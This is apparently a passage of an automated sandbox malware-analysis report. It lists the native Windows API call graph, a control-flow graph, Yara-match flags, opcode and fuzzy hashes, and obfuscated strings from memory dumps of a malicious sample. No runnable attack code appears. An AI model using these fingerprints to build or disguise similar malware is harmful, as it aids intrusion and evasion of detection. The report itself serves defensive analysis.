2f2ffc3 99551->99572 99585 2f2fa60 99551->99585 99553 2f39960 NtClose 99552->99553 99555 2f2ffdc 99553->99555 99556 2f2fed6 99556->99552 99557 2f2fee1 99556->99557 99558 2f3bb00 RtlAllocateHeap 99557->99558 99559 2f2ff0a 99558->99559 99560 2f2ff13 99559->99560 99561 2f2ff29 99559->99561 99562 2f39960 NtClose 99560->99562 99594 2f2f950 CoInitialize 99561->99594 99564 2f2ff1d 99562->99564 99565 2f2ff37 99597 2f39400 99565->99597 99567 2f2ffb2 99568 2f39960 NtClose 99567->99568 99569 2f2ffbc 99568->99569 99570 2f3ba20 RtlFreeHeap 99569->99570 99570->99572 99571 2f2ff55 99571->99567 99573 2f39400 LdrInitializeThunk 99571->99573 99573->99571 99575 2f26703 99574->99575 99576 2f26727 99575->99576 99601 2f394a0 99575->99601 99576->99549 99578 2f2674a 99578->99576 99579 2f39960 NtClose 99578->99579 99580 2f267ca 99579->99580 99580->99549 99582 2f26805 99581->99582 99606 2f39290 99582->99606 99586 2f2fa7c 99585->99586 99587 2f24960 LdrLoadDll 99586->99587 99589 2f2fa9a 99587->99589 99588 2f2faa3 99588->99556 99589->99588 99590 2f24960 LdrLoadDll 99589->99590 99591 2f2fb6e 99590->99591 99592 2f24960 LdrLoadDll 99591->99592 99593 2f2fbcb 99591->99593 99592->99593 99593->99556 99596 2f2f9b5 99594->99596 99595 2f2fa4b CoUninitialize 99595->99565 99596->99595 99598 2f3941a 99597->99598 99611 3a02ba0 LdrInitializeThunk 99598->99611 99599 2f3944a 99599->99571 99602 2f394ba 99601->99602 99605 3a02ca0 LdrInitializeThunk 99602->99605 99603 2f394e6 99603->99578 99605->99603 99607 2f392aa 99606->99607 99610 3a02c60 LdrInitializeThunk 99607->99610 99608 2f26879 99608->99551 99610->99608 99611->99599 99612 2f27540 99613 2f2755c 99612->99613 99621 2f275af 99612->99621 99615 2f39960 NtClose 99613->99615 99613->99621 99614 2f276e7 99616 2f27577 99615->99616 99622 2f26960 NtClose LdrInitializeThunk LdrInitializeThunk 99616->99622 99618 2f276c1 99618->99614 99624 2f26b30 NtClose LdrInitializeThunk LdrInitializeThunk 99618->99624 99621->99614 99623 2f26960 NtClose LdrInitializeThunk LdrInitializeThunk 99621->99623 99622->99621 99623->99618 99624->99614 99625 2f39640 99626 2f396fa 99625->99626 99627 2f39672 99625->99627 99628 2f39710 NtCreateFile 99626->99628 99629 2f30580 99630 2f3059d 99629->99630 99631 2f24960 LdrLoadDll 99630->99631 99632 2f305bb 99631->99632 99633 2f22b88 99634 2f266d0 2 API calls 99633->99634 99635 2f22bb3 99634->99635 99636 2f2350c 99637 2f28190 2 API calls 99636->99637 99638 2f2351c 99637->99638 99639 2f39960 NtClose 99638->99639 99640 2f23538 99638->99640 99639->99640

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 27 2f19f90-2f1a3aa 28 2f1a3bb-2f1a3c7 27->28 29 2f1a3c9-2f1a3db 28->29 30 2f1a3dd-2f1a3ee 28->30 29->28 31 2f1a3ff-2f1a409 30->31 33 2f1a443-2f1a45e 31->33 34 2f1a40b-2f1a441 31->34 36 2f1a46f-2f1a47b 33->36 34->31 37 2f1a4a0-2f1a4a9 36->37 38 2f1a47d-2f1a48d 36->38 41 2f1a7b9-2f1a7c3 37->41 42 2f1a4af-2f1a4b9 37->42 39 2f1a48f-2f1a498 38->39 40 2f1a49e 38->40 39->40 40->36 44 2f1a7c5-2f1a7e0 41->44 45 2f1a7fc-2f1a806 41->45 46 2f1a4ca-2f1a4d6 42->46 47 2f1a7e2-2f1a7e6 44->47 48 2f1a7e7-2f1a7e9 44->48 51 2f1a808-2f1a823 45->51 52 2f1a83f-2f1a846 45->52 49 2f1a4f4-2f1a50a 46->49 50 2f1a4d8-2f1a4e4 46->50 47->48 56 2f1a7eb-2f1a7f4 48->56 57 2f1a7fa 48->57 53 2f1a51b-2f1a525 49->53 60 2f1a4f2 50->60 61 2f1a4e6-2f1a4ec 50->61 58 2f1a825-2f1a829 51->58 59 2f1a82a-2f1a82c 51->59 54 2f1a9b2-2f1a9bc 52->54 55 2f1a84c-2f1a858 52->55 65 2f1a527-2f1a577 53->65 66 2f1a579-2f1a58b 53->66 67 2f1a85a-2f1a87b 55->67 68 2f1a87d-2f1a887 55->68 56->57 57->41 58->59 62 2f1a83d 59->62 63 2f1a82e-2f1a837 59->63 60->46 61->60 62->45 63->62 65->53 69 2f1a591-2f1a598 66->69 70 2f1a684-2f1a68b 66->70 67->55 72 2f1a898-2f1a8a4 68->72 74 2f1a5ca-2f1a5d4 69->74 75 2f1a59a-2f1a5c8 69->75 73 2f1a696-2f1a69d 70->73 76 2f1a8b4-2f1a8be 72->76 77 2f1a8a6-2f1a8b2 72->77 78 2f1a6c8-2f1a6d2 73->78 79 2f1a69f-2f1a6c6 73->79 80 2f1a5e5-2f1a5f1 74->80 75->69 81 2f1a8cf-2f1a8db 76->81 77->72 83 2f1a6e3-2f1a6ef 78->83 79->73 85 2f1a5f3-2f1a602 80->85 86 2f1a604-2f1a60b 80->86 87 2f1a8f2-2f1a8f9 81->87 88 2f1a8dd-2f1a8f0 81->88 89 2f1a6f1-2f1a703 83->89 90 2f1a705-2f1a70f 83->90 85->80 92 2f1a642-2f1a64c 86->92 93 2f1a60d-2f1a619 86->93 94 2f1a930-2f1a93a 87->94 95 2f1a8fb-2f1a92e 87->95 88->81 89->83 99 2f1a720-2f1a72c 90->99 98 2f1a65d-2f1a669 92->98 100 2f1a620-2f1a640 93->100 101 2f1a61b-2f1a61f 93->101 97 2f1a94b-2f1a957 94->97 95->87 103 2f1a959-2f1a962 97->103 104 2f1a96f call 2f3b690 97->104 105 2f1a66b-2f1a67d 98->105 106 2f1a67f 98->106 107 2f1a742-2f1a749 99->107 108 2f1a72e-2f1a740 99->108 100->86 101->100 113 2f1a964-2f1a967 103->113 114 2f1a96d 103->114 118 2f1a974-2f1a97e 104->118 105->98 106->41 109 2f1a770-2f1a784 107->109 110 2f1a74b-2f1a76e 107->110 108->99 116 2f1a795-2f1a7a1 109->116 110->107 113->114 117 2f1a93c-2f1a945 114->117 119 2f1a7a3-2f1a7b2 116->119 120 2f1a7b4 116->120 117->97 118->54 121 2f1a980-2f1a99f 118->121 119->116 120->37 123 2f1a9a1-2f1a9aa 121->123 124 2f1a9b0 121->124 123->124 124->118
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: <$ [$!c$#f$$$($-O-T$-T$56$Ds$Fb$M8$MS$N$NV$P8$PC$Q$QO$R$[$^$a"$aq$b$bt$bt$cb$e$e\$e]$h$n$vi$x$$z@$}$I$t
                                                  • API String ID: 0-295432161
                                                  • Opcode ID: fff98a8453f5bdfa6d36316d500ec993694e478ddce5d1cb247a2e85857491aa
                                                  • Instruction ID: 56c630bed80f2626d67ae9d1fee989b0ade6d5c024aafb1eafd51cbd02645bfe
                                                  • Opcode Fuzzy Hash: fff98a8453f5bdfa6d36316d500ec993694e478ddce5d1cb247a2e85857491aa
                                                  • Instruction Fuzzy Hash: BE429DB0D06229CBEB25CF44C9A8BDDBBB2BB45348F5081D9C54D6B281C7B95AC9CF40
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F2CAF4
                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02F2CB2F
                                                  • FindClose.KERNELBASE(?), ref: 02F2CB3A
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 3541575487-0
                                                  • Opcode ID: 6b2015aa91fc6e1246276bdd291c7b490f7059428ee964901ea5b36ba32bc516
                                                  • Instruction ID: 403bcd981f8141144f85474c33a149bdd7c5a30855f8af378a0b48739aa59b95
                                                  • Opcode Fuzzy Hash: 6b2015aa91fc6e1246276bdd291c7b490f7059428ee964901ea5b36ba32bc516
                                                  • Instruction Fuzzy Hash: 3E3194B1A0021CBBDB20DF60CC85FEF777D9F85784F144559FA09A7180D774AA898BA0
                                                  APIs
                                                  • NtCreateFile.NTDLL(?,?,?,?,B91DC9C4,?,?,?,?,?,?), ref: 02F39741
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 5a38ad85594f6784711b9de879168fc1a737e229a98eecd9b68a90cf89a392c6
                                                  • Instruction ID: 84e3237af886c8fd4899654ec9cf7dd6df344cd0e590e0e06f4560aaf15ee76a
                                                  • Opcode Fuzzy Hash: 5a38ad85594f6784711b9de879168fc1a737e229a98eecd9b68a90cf89a392c6
                                                  • Instruction Fuzzy Hash: 8531A4B5A00648AFCB14DF99D881EEF77F9AF89714F108219FA19A7240D730A911CBA4
                                                  APIs
                                                  • NtReadFile.NTDLL(?,?,?,?,B91DC9C4,?,?,?,?), ref: 02F39899
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: fb8bfa857bb19e2076a26ef0ef5f60faf9986c093b506c2ac0c840562c3eae42
                                                  • Instruction ID: 10877250815f6a2006b27b8687d4410dbc035178b7b1f96f2ce6c9f5af828938
                                                  • Opcode Fuzzy Hash: fb8bfa857bb19e2076a26ef0ef5f60faf9986c093b506c2ac0c840562c3eae42
                                                  • Instruction Fuzzy Hash: 4631D8B5A00648AFDB14DF99DC41EEF77F9EF89314F108219FA19A7240D770A9118FA4
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(02F2218E,?,02F3842F,00000000,B91DC9C4,00003000,?,?,?,?,?,02F3842F,02F2218E), ref: 02F39B8B
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: 70e5b60fea7e4116acc03c30de9bd4b5fe89e03f9668c6c9b172b87332503acd
                                                  • Instruction ID: 599c952c99ee522dada7d32650df30f14eb15fdb502a04887f0f7fc1a31c28f0
                                                  • Opcode Fuzzy Hash: 70e5b60fea7e4116acc03c30de9bd4b5fe89e03f9668c6c9b172b87332503acd
                                                  • Instruction Fuzzy Hash: EE2119B5A00249ABDB14DF98DC41FEFB7B9EF89704F108109FE19AB240D774A9118BA5
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 0e86df40b8e2ff60be5de333c1d3996108f6b261b9232bb12763f768df99e3d2
                                                  • Instruction ID: 8c3cad9c3f06f6bde4cf130295509d0f5e42864427a39e29700cf586834892a2
                                                  • Opcode Fuzzy Hash: 0e86df40b8e2ff60be5de333c1d3996108f6b261b9232bb12763f768df99e3d2
                                                  • Instruction Fuzzy Hash: C9119E72A006086ED620EA64DC01FAF77ADEF85714F108109FA48A7280D770A9058BA5
                                                  APIs
                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F39994
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 4d01af7a7d738745b7d0c40722cbfdbdbc250f8d3261de578766de33a0c527b8
                                                  • Instruction ID: 78bff4dca6cf76807b65f5a9f8e369aece0b5f30ec6f243d66d6d9482ad1d766
                                                  • Opcode Fuzzy Hash: 4d01af7a7d738745b7d0c40722cbfdbdbc250f8d3261de578766de33a0c527b8
                                                  • Instruction Fuzzy Hash: 89E046322002047BD220EA6ADC41F9BB76DDBC9764F508415FB08A7240CA70B9018BE0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 31ac5fc5905b5ac623ac4354bdbaf67927f4e783a2901e51fbe9fa3a930768ce
                                                  • Instruction ID: 99d0d724214cf2f7dc0ec5e893d13461f0edd6cc1dbc1a2c54aecd90d445799a
                                                  • Opcode Fuzzy Hash: 31ac5fc5905b5ac623ac4354bdbaf67927f4e783a2901e51fbe9fa3a930768ce
                                                  • Instruction Fuzzy Hash: 59900231645804139140B1584884546500997E1341B56C012E0424554C8B188A665371
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5a206aa97b20e507b0981e2775fc402c684227564b718d3c48e2ac5d2c87d16d
                                                  • Instruction ID: 817cf61d7055f150aa0ad9156a137e0de01f7e0e6f16ce2660690b578b7495fb
                                                  • Opcode Fuzzy Hash: 5a206aa97b20e507b0981e2775fc402c684227564b718d3c48e2ac5d2c87d16d
                                                  • Instruction Fuzzy Hash: 7F900261641504434140B1584804406700997E2341396C116A0554560C871C89659279
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 48cf0ee8aaca16389c6db1321561eafe207c88c9aee48467fc991d5aaa13429f
                                                  • Instruction ID: befa70ed3447228d20fbf4093ea606390827daa98201ecf4c0b22ec1f59650f8
                                                  • Opcode Fuzzy Hash: 48cf0ee8aaca16389c6db1321561eafe207c88c9aee48467fc991d5aaa13429f
                                                  • Instruction Fuzzy Hash: AA90023164540C03D150B1584414746100987D1341F56C012A0024654D87598B6576B1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 11f87210a98f5f37e12b31be017a19432bd0e40ee8aea5cb3faeb51c7d313a80
                                                  • Instruction ID: b090757dc4ed84e2ce62c72504d781ec77fec45892a769b5c4996e6b1ef11707
                                                  • Opcode Fuzzy Hash: 11f87210a98f5f37e12b31be017a19432bd0e40ee8aea5cb3faeb51c7d313a80
                                                  • Instruction Fuzzy Hash: 9C90023124544C43D140B1584404A46101987D1345F56C012A0064694D97298E65B671
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4b9642e8938a655899e0627cd8802841e2b29778cf70b0ceefae52f23e5a7df0
                                                  • Instruction ID: bc838bcb05ad4f97d94506234b61db0ad6427e07792dea0006b23eea647b5667
                                                  • Opcode Fuzzy Hash: 4b9642e8938a655899e0627cd8802841e2b29778cf70b0ceefae52f23e5a7df0
                                                  • Instruction Fuzzy Hash: B290023124140C03D180B158440464A100987D2341F96C016A0025654DCB198B6977B1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bacecfe7e36eabf77b489f3ee8c744bab029d6ae30f37eef65f65d4bb49605ed
                                                  • Instruction ID: 9a0864b60d423d59355741afda45ceccb867be903ec77fb65d9b5ce806b65efc
                                                  • Opcode Fuzzy Hash: bacecfe7e36eabf77b489f3ee8c744bab029d6ae30f37eef65f65d4bb49605ed
                                                  • Instruction Fuzzy Hash: BE900261242404034105B1584414616500E87E1241B56C022E1014590DC72989A16135
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bfb0707e8a953abb5b633dccab924a0ad13bc3b2d246fbc8548ed29afb392ad3
                                                  • Instruction ID: a4a794f54c4fac3ca7ffa68e0a2771c375d88657bd6239722c9646136e5ded88
                                                  • Opcode Fuzzy Hash: bfb0707e8a953abb5b633dccab924a0ad13bc3b2d246fbc8548ed29afb392ad3
                                                  • Instruction Fuzzy Hash: 76900225261404030145F558060450B144997D7391396C016F1416590CC72589755331
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8946382375ccce786f613673709cd5e7bb46d3a9b68a0e8e639a380a2828f7ab
                                                  • Instruction ID: a0116552a0a4364878434f81d05ab30a6d6d2a569269124c0e503424479a7e87
                                                  • Opcode Fuzzy Hash: 8946382375ccce786f613673709cd5e7bb46d3a9b68a0e8e639a380a2828f7ab
                                                  • Instruction Fuzzy Hash: 97900435351404030105F55C0704507104FC7D73D1357C033F1015550CD735CD715131
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 036509c46fffaa899c104bc8333125d9337a214ea0557cd948984f6d9a8eb710
                                                  • Instruction ID: 0c7cc63df06e1577dedc6df1ebac632787306ea536f7116111c016475ffa78f8
                                                  • Opcode Fuzzy Hash: 036509c46fffaa899c104bc8333125d9337a214ea0557cd948984f6d9a8eb710
                                                  • Instruction Fuzzy Hash: CF900221641404434140B16888449065009ABE2251756C122A0998550D875D89755675
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5a2c68d9722bbbd52359610163ca2b7c32d07f14ad5b8e7c5cb3b31de594c47b
                                                  • Instruction ID: 67540f9a40120ba76f24168bc00a853197df84ea9c3402814fabb05a69b63001
                                                  • Opcode Fuzzy Hash: 5a2c68d9722bbbd52359610163ca2b7c32d07f14ad5b8e7c5cb3b31de594c47b
                                                  • Instruction Fuzzy Hash: 40900221251C0443D200B5684C14B07100987D1343F56C116A0154554CCB1989715531
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b3af3364d15afbcee26033dcb816bb91c7bf5e15b705948daa15eb384fd07382
                                                  • Instruction ID: 48358566f50d7e4ba5dfbab30f022caf3d2bab232e1c00c8dc0a1bd0106bf1d3
                                                  • Opcode Fuzzy Hash: b3af3364d15afbcee26033dcb816bb91c7bf5e15b705948daa15eb384fd07382
                                                  • Instruction Fuzzy Hash: 8290026138140843D100B1584414B061009C7E2341F56C016E1064554D871DCD626136
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f0f2ecec7d4f4d5501a3feb8cdbf42ad98a01bd50fcf181202c9ac3fb51840dd
                                                  • Instruction ID: 4e04940a226cc4f1d44c1011db4deaf84ea0b8f5a50f47102bee9056fc9f26e8
                                                  • Opcode Fuzzy Hash: f0f2ecec7d4f4d5501a3feb8cdbf42ad98a01bd50fcf181202c9ac3fb51840dd
                                                  • Instruction Fuzzy Hash: 6D90022164140903D101B1584404616100E87D1281F96C023A1024555ECB298AA2A131
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 011623c54f074b53efa2c27b2f9051a7799a77b275e6a38e0fd445ed12d6fef3
                                                  • Instruction ID: 2895103ebcbedb6274009fc8682b67221269b2c52c232af34a362be99e06157d
                                                  • Opcode Fuzzy Hash: 011623c54f074b53efa2c27b2f9051a7799a77b275e6a38e0fd445ed12d6fef3
                                                  • Instruction Fuzzy Hash: 7F90026124180803D140B5584804607100987D1342F56C012A2064555E8B2D8D616135
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
